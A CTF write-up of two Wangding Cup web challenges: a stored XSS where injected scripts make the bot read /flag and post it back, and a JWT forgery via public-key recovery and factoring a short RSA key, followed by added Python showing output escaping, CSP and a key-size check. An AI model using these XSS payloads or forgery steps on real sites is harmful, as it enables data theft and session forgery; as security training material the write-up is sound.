To be honest I wasn't going to write this post, because I never had an environment to reproduce the challenges in, but I decided to record that XSS challenge from Wangding (网鼎杯) anyway: XSS challenges are rare in domestic CTFs and my own understanding of XSS is fairly average. Since there is no reproduction environment, most of what follows is from memory; I forgot to take screenshots during the competition...

web02

First, log in with any username and password; the server returns a hashed path. In the back end you'll notice that whatever value we submit is sent straight to the task bar without any encoding, so this is a stored XSS. After some trying I found that

><script>alert(1)</script>

is enough to trigger the XSS.

At that point my first thought was to exfiltrate out-of-band, so I tried several out-of-band payloads, none of which worked. That made me suspect the bot could only access this site.
So I wrote the following payload to try to make the bot send a POST request that writes the string "aaa" into the task bar:

<script>
fetch("http://0192d601faa97dffa2890e43bf77feeb.i5nk.dg04.ciihw.cn:46662/content/f4a62598d9e423749687a71a0adab246", {
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    body: "content='aaaa'"
})
.then(response => response.text())
.then(data => console.log(data));
</script>

It didn't work, which left me stumped. After many more attempts I finally found that the bot would not visit URLs containing http.... So I changed the payload to this:

<script>
fetch("/content/f4a62598d9e423749687a71a0adab246", {
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    body: "content='aaaa'"
})
.then(response => response.text())
.then(data => console.log(data));
</script>

and it successfully made the request and wrote the content. The flag is served under the /flag route, so we only need to make the bot fetch /flag and write the response into the task bar:

><script>
fetch('/flag')
    .then(response => response.text())
    .then(data => {
        console.log("Flag Data:", data);
        fetch('/content/6dd78abd8072067672645b3429746fcd', {
            method: 'POST',
            headers: {'Content-Type': 'application/x-www-form-urlencoded'},
            body: "content=123" + data
        })
        .then(response => response.text())
        .then(result => { console.log("Response from /content/url:", result); });
    });
</script>
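The observation that the bot only makes same-origin requests illustrates why restricting the bot's egress does not fix a stored XSS: the injected script can still use the application's own endpoints, as the payloads above do. The fix belongs at the output: HTML-encode the stored value when it is rendered, and add a Content-Security-Policy as defence in depth. The following is an added example of mine, not code from the challenge or from this write-up; the `<li>` template, the function names and the CSP value are assumptions, since the write-up does not show the real markup.

```python
# Added example (not from the original write-up): a minimal model of the
# task-bar rendering flaw in web02 and its fix. The <li> template and the CSP
# value are assumptions; the challenge's real HTML was not shown.
import html
from urllib.parse import parse_qs, quote

# The payload from the write-up, used here as constructed test input.
PAYLOAD = "><script>alert(1)</script>"


def parse_content(form_body: str) -> str:
    """Extract the 'content' field from an application/x-www-form-urlencoded body,
    the format the bot POSTs in the write-up."""
    fields = parse_qs(form_body, keep_blank_values=True)
    return fields.get("content", [""])[0]


def render_task_vulnerable(content: str) -> str:
    """Interpolates the stored value straight into markup: stored XSS."""
    return f'<li class="task">{content}</li>'


def render_task_safe(content: str) -> str:
    """HTML-escapes the value for an element body: & < > " ' become entities,
    so the browser shows the payload as text instead of running it."""
    return f'<li class="task">{html.escape(content, quote=True)}</li>'


def response_headers() -> dict:
    """Defence in depth: a CSP without 'unsafe-inline' leaves an injected
    <script> block inert even if an encoding bug slips through elsewhere."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }


def has_script_tag(rendered: str) -> bool:
    """Simple detection check for rendered output: does it contain a live <script> tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    # Simulate the bot's POST: the body carries the payload URL-encoded.
    stored = parse_content("content=" + quote(PAYLOAD))
    print("vulnerable:", render_task_vulnerable(stored))
    print("safe:      ", render_task_safe(stored))
    print("CSP:       ", response_headers()["Content-Security-Policy"])
```

The escaped rendering keeps the user's text intact (it still reads as `><script>alert(1)</script>` on screen) while removing every character the HTML parser could treat as markup; the CSP is a second layer, not a substitute for the encoding.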

web1

Since there is no environment to reproduce this one either, I'll just briefly walk through the JWT part; personally I consider the JWT to be the hard part of this challenge.

First, for the JWT, we can try to recover the public key with the tool rsa_sign2n:

python jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbTFpbiJ9.FW-UjoD_ldtasCm1OJli6JhnTSicnnGDrkapCnJRkBcfo6rxnzu6sldJI321anP4BRHwJZJHWDW_q22KhAqS9HtS_tJGCJG_t5iX6UbED03yFLrZ_yBoYX0Va-ExC9PNF-2zohPjGP0u9wsF-27120zrpO_9PqkCFze_Xys-VflN eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEifQ.HDso3-3ZGjO8_J2ziO5Z2UasjqAl6v50-LrCIe-AmeHRrTWPaJco5Kai5u3eyM4kNInKSjn2fCDjhPvP3-QO2b69BpuNKE7uDRVzuuip6N3T-mnrKBbHrbOPWGFdNIOsPxKyhBn9OC4pOQB5mi5pBXVTh_JCuNXf7dm3_nEz-hY6

The tool writes the public key to a file in the same directory:

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv
IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN
MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502
ZMSv0AxMgN5UMh9FCwIDAQAB
-----END PUBLIC KEY-----


We can see that the public key is very short, so it can be factored directly. I'm a web player and, apart from one RSA challenge at hgame in my freshman year, I have hardly touched RSA since, so I went straight for the script RsaCtfTool.

Also, installing many of these tools side by side easily causes dependency conflicts, so you can use a virtual environment like this:

python -m venv xxxx
cd xxxx/Scripts
./activate

# to leave the virtual environment
deactivate

Then use the tool to obtain the private key:

python RsaCtfTool.py --publickey ./public --private

Then use this site to forge the token: https://www.bejson.com/jwt/ ; jwt.io is a bit awkward to use.
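The security lesson of the JWT part is that recovering the public key from signatures is expected (public keys are not meant to be secret); what made the token forgeable was an RSA modulus short enough to factor. A verifier should therefore pin the accepted algorithm and refuse keys below a minimum size. The following added example is mine, not code from the write-up or from rsa_sign2n or RsaCtfTool: it parses the PEM shown above with a minimal DER reader, decodes the header of the first token shown above, and checks both against such a policy. It does not verify the RS256 signature itself; the policy thresholds are my assumptions.

```python
# Added example (not from the original write-up): a key and algorithm policy
# check that a JWT verifier should run before trusting an RS256 token.
# Standard library only; the RS256 signature is not verified here.
import base64
import json

# Public key exactly as written to disk by rsa_sign2n in the write-up.
PUBLIC_KEY_PEM = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv
IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN
MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502
ZMSv0AxMgN5UMh9FCwIDAQAB
-----END PUBLIC KEY-----"""

# First of the two tokens passed to jwt_forgery.py in the write-up.
TOKEN_1 = ("eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbTFpbiJ9."
           "FW-UjoD_ldtasCm1OJli6JhnTSicnnGDrkapCnJRkBcfo6rxnzu6sldJI321anP4BRHwJZJHWDW_"
           "q22KhAqS9HtS_tJGCJG_t5iX6UbED03yFLrZ_yBoYX0Va-ExC9PNF-2zohPjGP0u9wsF-27120zrpO_"
           "9PqkCFze_Xys-VflN")

# Policy thresholds (assumed values for this example).
MIN_RSA_BITS = 2048
ALLOWED_ALGS = {"RS256"}


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_header(token: str) -> dict:
    """Parse the JOSE header (first dot-separated segment) without trusting it."""
    return json.loads(b64url_decode(token.split(".")[0]))


def _read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value at pos; return (tag, value, position after it).
    Handles short-form and long-form (0x81, 0x82, ...) lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = count of length bytes
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(pem: str):
    """Return (n, e) from a PEM SubjectPublicKeyInfo wrapping a PKCS#1 RSAPublicKey."""
    body = "".join(line for line in pem.strip().splitlines() if not line.startswith("-----"))
    der = base64.b64decode(body)
    tag, spki, _ = _read_tlv(der, 0)                    # SubjectPublicKeyInfo SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _tag, _alg, pos = _read_tlv(spki, 0)                 # AlgorithmIdentifier (skipped)
    tag, bitstr, _ = _read_tlv(spki, pos)               # subjectPublicKey BIT STRING
    if tag != 0x03:
        raise ValueError("expected BIT STRING")
    tag, rsakey, _ = _read_tlv(bitstr[1:], 0)           # skip the unused-bits byte
    if tag != 0x30:
        raise ValueError("expected RSAPublicKey SEQUENCE")
    tag_n, n_bytes, pos = _read_tlv(rsakey, 0)
    tag_e, e_bytes, _ = _read_tlv(rsakey, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def check_verifier_policy(token: str, pem: str) -> list:
    """Return policy findings; an empty list means the token/key pair may proceed
    to signature verification."""
    findings = []
    alg = decode_jwt_header(token).get("alg")
    if alg not in ALLOWED_ALGS:
        findings.append(f"alg {alg!r} not in allow-list {sorted(ALLOWED_ALGS)}")
    n, e = parse_rsa_spki(pem)
    if n.bit_length() < MIN_RSA_BITS:
        findings.append(f"RSA modulus is {n.bit_length()} bits, below the {MIN_RSA_BITS}-bit minimum")
    if e < 65537:
        findings.append(f"public exponent {e} is unusually small")
    return findings


if __name__ == "__main__":
    for finding in check_verifier_policy(TOKEN_1, PUBLIC_KEY_PEM) or ["policy OK"]:
        print(finding)
```

On the key above the check reports a modulus well under 2048 bits, which is the finding that matters: a verifier that had refused this key size (and hard-coded RS256 rather than reading `alg` from the token) would not have accepted the forged token even with the private key recovered.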